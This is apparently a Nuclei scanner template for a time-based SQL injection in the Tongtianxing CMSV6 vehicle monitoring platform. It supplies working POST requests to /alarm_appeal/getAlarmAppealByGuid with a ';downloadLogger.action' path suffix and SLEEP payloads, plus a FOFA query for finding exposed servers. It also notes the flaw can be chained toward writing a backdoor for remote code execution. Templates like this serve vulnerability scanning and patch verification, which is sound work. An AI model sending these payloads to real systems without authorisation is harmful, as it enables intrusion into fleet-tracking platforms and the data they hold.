id: tongtianxingCMSV6-getAlarmAppealByGuid-sql

info:
  name: 通天星CMSV6车载定位监控平台 getAlarmAppealByGuid SQL注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: body="/808gps/"
    该漏洞是由于通天星CMSV6车载定位监控平台 /alarm_appeal/getAlarmAppealByGuid 接口处未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取获取网站绝对路径写入后门文件进行远程代码执行。
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486972&idx=1&sn=17035fc2befc8ffdbf61f31e04df6a6e&chksm=c267b8cff51031d95d0e04758f1270dfbe2d414449123ab27a6d30c1bbddc3d0237550ffb5c8&token=239710718&lang=zh_CN#rd
  tags: sql injection


http:
  - raw:
      - |
        POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Content-Type: application/x-www-form-urlencoded

        guid=1') AND (SELECT 3904 FROM (SELECT(SLEEP(4)))PITq) AND ('qhqF'='qhqF

      - |
        POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Content-Type: application/x-www-form-urlencoded

        guid=1') AND (SELECT 3904 FROM (SELECT(SLEEP(8)))PITq) AND ('qhqF'='qhqF
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and





